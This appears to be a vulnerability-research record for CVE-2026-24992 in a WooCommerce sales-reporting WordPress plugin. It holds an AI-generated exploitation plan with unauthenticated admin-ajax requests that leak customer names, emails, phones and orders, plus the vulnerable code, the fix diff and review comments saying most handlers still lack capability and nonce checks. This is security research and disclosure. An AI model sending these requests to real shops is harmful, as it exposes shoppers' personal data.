[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5sKR41N2lqR-kUqRNVSVQF5aNxSM7IzGfJQCvOcbFUA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-24992","advanced-woocommerce-product-sales-reporting-unauthenticated-information-exposure","Advanced WooCommerce Product Sales Reporting \u003C= 4.1.2 - Unauthenticated Information Exposure","The Advanced WooCommerce Product Sales Reporting – Statistics & Forecast plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.1.2. 
This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","webd-woocommerce-advanced-reporting-statistics",null,"\u003C=4.1.2","4.1.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-23 00:00:00","2026-02-02 21:02:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F86d01f1b-f1f3-4d28-8fd9-6f17d610a38c?source=api-prod",11,[22,23,24,25],"helper-class.php","langs\u002Fwebd-woocommerce-reporting-statistics.pot","readme.txt","webd-woocommerce-reporting-statistics.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-24992\n\n## 1. Vulnerability Summary\nThe **Advanced WooCommerce Product Sales Reporting** plugin (up to version 4.1.2) is vulnerable to **Unauthenticated Information Exposure**. The plugin registers several AJAX handlers for generating reports (customers, orders, countries, etc.) using the `wp_ajax_nopriv_` hook. This makes these endpoints accessible to unauthenticated users. Furthermore, the handler functions in `OrderProcessorHelp` do not implement capability checks (`current_user_can`) or nonce verification, allowing any remote actor to extract sensitive customer lists, order histories, and sales data.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `get_customers` (or `get_orders`, `get_coupons`)\n- **HTTP Method**: `POST`\n- **Authentication**: None (Unauthenticated)\n- **Preconditions**:\n    - The plugin must be active.\n    - WooCommerce must be installed and contain customer or order data.\n- **Vulnerable Hook**: `wp_ajax_nopriv_get_customers` (and others defined in `helper-class.php`).\n\n## 3. Code Flow\n1.  **Entry Point**: An unauthenticated user sends a `POST` request to `admin-ajax.php` with `action=get_customers`.\n2.  
**Hook Registration**: In `helper-class.php`, the `OrderProcessorHelp::__construct()` method registers the hook:\n    ```php\n    add_action( 'wp_ajax_get_customers',        array( $this,'get_customers' ) );\n    add_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );\n    ```\n3.  **Handler Execution**: WordPress executes `OrderProcessorHelp::get_customers()`.\n4.  **Missing Protection**: The `get_customers` function (and others like `get_orders`) fails to call `check_ajax_referer()` or `current_user_can( 'manage_woocommerce' )`.\n5.  **Data Sink**: The function queries the WooCommerce database (specifically the customer lookup tables or `wp_users`\u002F`wp_usermeta`) and returns a JSON-encoded list of customer details including names, emails, and phone numbers.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required.**\nAnalysis of the `webdWoocommerceReportingStatistics::BackEndScripts()` function in `webd-woocommerce-reporting-statistics.php` shows the `wp_localize_script` call for the `webdWoocommerceReportingStatistics` object:\n```php\nwp_localize_script(\n    \"webd-woocommerce-reporting-statistics\".\"adminJs\",\n    \"webdWoocommerceReportingStatistics\",\n    array(\n        'thispluginpage' => admin_url(\"\u002Fadmin.php?page=\".$this->slug),\n        'url'            => admin_url( 'admin-ajax.php' ),\n        'plugin_url'     => plugins_url( '', __FILE__ ),\n        'ajax_url'       => admin_url( 'admin-ajax.php' ),\n        'siteUrl'        => site_url(),\n        'plugin_wrapper' => \"webd-woocommerce-reporting-statistics\",\n        \u002F\u002F ... (No nonce parameter present)\n    )\n);\n```\nFurthermore, the `nopriv_` registration indicates the endpoints were erroneously exposed to public access. The handlers in `helper-class.php` are expected to process the request directly.\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Extract Customer List (PII Exposure)\nThis request targets the customer report data.\n\n- **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: `action=get_customers`\n\n### Step 2: Extract Order Details\nThis request targets the order history, which may contain transaction IDs and specific product interests.\n\n- **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: `action=get_orders`\n\n### Step 3: Extract Reporting Statistics\nThis request targets overall sales metrics.\n\n- **URL**: `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**: `action=display_orders_by_period&tab=months`\n\n## 6. Test Data Setup\n1.  **Install WooCommerce**: Ensure WooCommerce is active.\n2.  **Create a Customer**:\n    ```bash\n    wp user create victim victim@example.com --role=customer --user_pass=password123 --first_name=\"Victim\" --last_name=\"User\"\n    ```\n3.  **Create an Order**: Use WC CLI to create a sample order for the customer.\n    ```bash\n    wp wc shop_order create --customer_id=2 --status=completed --set_paid=true\n    ```\n4.  **Configure Plugin**: The plugin uses default settings upon activation in `onActivation()`. No further configuration is needed.\n\n## 7. Expected Results\n- **Success Criteria**: The HTTP response should be `200 OK` and contain a JSON array or object.\n- **Data Exposed**: For `action=get_customers`, the response should contain PII fields such as:\n    - `billing_email`\n    - `billing_phone`\n    - `first_name` \u002F `last_name`\n    - `city` \u002F `country`\n- **Format**: Likely a JSON list compatible with DataTables (e.g., `{\"data\": [...], \"recordsTotal\": ...}`).\n\n## 8. 
Verification Steps\nAfter performing the HTTP request:\n1.  Verify the leaked data matches the database records:\n    ```bash\n    wp user list --role=customer --fields=user_email,display_name\n    ```\n2.  Compare the email addresses in the AJAX response with the output of the `wp user list` command. If they match, information exposure is confirmed.\n\n## 9. Alternative Approaches\nIf `get_customers` does not return data directly (e.g., if it requires pagination parameters), attempt adding standard DataTables parameters:\n- **Body**: `action=get_customers&start=0&length=10&draw=1`\n\nIf `get_customers` is restricted by specific environment settings, attempt:\n- **Action**: `get_coupons` (Exposes discount codes and usage limits).\n- **Action**: `get_payments` (Exposes payment gateway configuration names and transaction volumes).","The plugin incorrectly exposes several AJAX endpoints intended for administrative reporting to unauthenticated users by registering them with the 'wp_ajax_nopriv_' hook. 
Due to a lack of capability checks and nonce verification within the handler functions, attackers can extract sensitive WooCommerce information, including customer PII, order histories, and sales statistics.","\u002F\u002F helper-class.php line 104\npublic function __construct() {\n\n    add_action( 'wp_ajax_getOrders',        array( $this,'getOrders' ) );\n    add_action( 'wp_ajax_nopriv_getOrders', array( $this,'getOrders' ) );\n\n    add_action( 'wp_ajax_get_orders',        array( $this,'get_orders' ) );\n    add_action( 'wp_ajax_nopriv_get_orders', array( $this,'get_orders' ) );\n\n    add_action( 'wp_ajax_get_customers',        array( $this,'get_customers' ) );\n    add_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );\n\n    add_action( 'wp_ajax_get_countries',        array( $this,'get_countries' ) );\n    add_action( 'wp_ajax_nopriv_get_countries', array( $this,'get_countries' ) );\n\n    add_action( 'wp_ajax_get_payments',        array( $this,'get_payments' ) );\n    add_action( 'wp_ajax_nopriv_get_payments', array( $this,'get_payments' ) );\n\n    add_action( 'wp_ajax_get_coupons',        array( $this,'get_coupons' ) );\n    add_action( 'wp_ajax_nopriv_get_coupons', array( $this,'get_coupons' ) );\n\n    add_action( 'wp_ajax_get_products',        array( $this,'get_products' ) );\n    add_action( 'wp_ajax_nopriv_get_products', array( $this,'get_products' ) );\n\n    add_action( 'wp_ajax_get_categories',        array( $this,'get_categories' ) );\n    add_action( 'wp_ajax_nopriv_get_categories', array( $this,'get_categories' ) );\n\n    add_action( 'wp_ajax_display_orders_by_period',        array( $this,'display_orders_by_period' ) );\n    add_action( 'wp_ajax_nopriv_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n\n}\n\n---\n\n\u002F\u002F helper-class.php line 833\npublic function get_customers() {\n\n    if (\n        is_admin() &&\n        (\n            isset( $_POST['action'] ) &&\n            
'get_customers' === $_POST['action']\n        )\n    ) {\n        \u002F\u002F ... queries database and returns data directly without capability check","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebd-woocommerce-advanced-reporting-statistics\u002F4.1.2\u002Fhelper-class.php\t2025-12-26 20:31:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwebd-woocommerce-advanced-reporting-statistics\u002F4.1.3\u002Fhelper-class.php\t2026-01-14 14:34:08.000000000 +0000\n@@ -101,36 +101,19 @@\n \n \t\u002F**\n \t * Constructor.\n+\t *\n+\t * @version 4.1.3\n \t *\u002F\n \tpublic function __construct() {\n-\n-\t\tadd_action( 'wp_ajax_getOrders',        array( $this,'getOrders' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_getOrders', array( $this,'getOrders' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_orders',        array( $this,'get_orders' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_orders', array( $this,'get_orders' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_customers',        array( $this,'get_customers' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_customers', array( $this,'get_customers' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_countries',        array( $this,'get_countries' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_countries', array( $this,'get_countries' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_payments',        array( $this,'get_payments' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_payments', array( $this,'get_payments' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_coupons',        array( $this,'get_coupons' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_coupons', array( $this,'get_coupons' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_products',        array( $this,'get_products' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_products', array( $this,'get_products' ) );\n-\n-\t\tadd_action( 'wp_ajax_get_categories',        array( $this,'get_categories' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_get_categories', array( 
$this,'get_categories' ) );\n-\n-\t\tadd_action( 'wp_ajax_display_orders_by_period',        array( $this,'display_orders_by_period' ) );\n-\t\tadd_action( 'wp_ajax_nopriv_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n-\n+\t\tadd_action( 'wp_ajax_getOrders', array( $this,'getOrders' ) );\n+\t\tadd_action( 'wp_ajax_get_orders', array( $this,'get_orders' ) );\n+\t\tadd_action( 'wp_ajax_get_customers', array( $this,'get_customers' ) );\n+\t\tadd_action( 'wp_ajax_get_countries', array( $this,'get_countries' ) );\n+\t\tadd_action( 'wp_ajax_get_payments', array( $this,'get_payments' ) );\n+\t\tadd_action( 'wp_ajax_get_coupons', array( $this,'get_coupons' ) );\n+\t\tadd_action( 'wp_ajax_get_products', array( $this,'get_products' ) );\n+\t\tadd_action( 'wp_ajax_get_categories', array( $this,'get_categories' ) );\n+\t\tadd_action( 'wp_ajax_display_orders_by_period', array( $this,'display_orders_by_period' ) );\n \t}\n \n \t\u002F**\n@@ -183,7 +166,8 @@\n \n \t\tif (\n \t\t\t'POST' === $_SERVER['REQUEST_METHOD'] &&\n-\t\t\t'display_orders_by_period' === $_POST['action']\n+\t\t\t'display_orders_by_period' === $_POST['action'] &&\n+\t\t\tcurrent_user_can( 'manage_woocommerce' )\n \t\t) {","The exploit targets the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint. An unauthenticated attacker sends a POST request with the 'action' parameter set to 'get_customers' (to leak PII), 'get_orders' (to leak transaction history), or 'get_coupons' (to leak discount data). 
Because the plugin registers these actions via wp_ajax_nopriv_ and the handler functions lack current_user_can() checks, the server will process the request and return the sensitive data in a JSON format without requiring any authentication or nonces.","gemini-3-flash-preview","2026-05-05 02:07:14","2026-05-05 02:07:44",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebd-woocommerce-advanced-reporting-statistics\u002Ftags\u002F4.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwebd-woocommerce-advanced-reporting-statistics.4.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebd-woocommerce-advanced-reporting-statistics\u002Ftags\u002F4.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwebd-woocommerce-advanced-reporting-statistics.4.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwebd-woocommerce-advanced-reporting-statistics\u002Ftags"]
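Review bot: the first hunk only removes the `wp_ajax_nopriv_*` registrations; the retained `wp_ajax_get_customers`, `wp_ajax_get_orders`, `wp_ajax_get_coupons` and sibling hooks still fire for every logged-in user, and nothing in this hunk adds a capability check to those handlers (the vulnerable `get_customers()` shown above gates only on `is_admin()` and the `action` value, and `is_admin()` is true for any admin-ajax.php request). Suggest guarding each handler body with `current_user_can( 'manage_woocommerce' )` and `check_ajax_referer()` rather than relying on hook registration alone, so that a customer-role account cannot read the same report data.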
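Review bot: the second hunk adds `current_user_can( 'manage_woocommerce' )` to `display_orders_by_period` only and adds no nonce verification, so that endpoint remains without CSRF protection and the other handlers registered in the constructor get no equivalent guard; suggest pairing the capability check with `check_ajax_referer()` and applying the same pair to every handler. The `@version 4.1.3` docblock bump is the only documentation of the change; a changelog entry in readme.txt naming the unauthenticated exposure would help site owners prioritize the update.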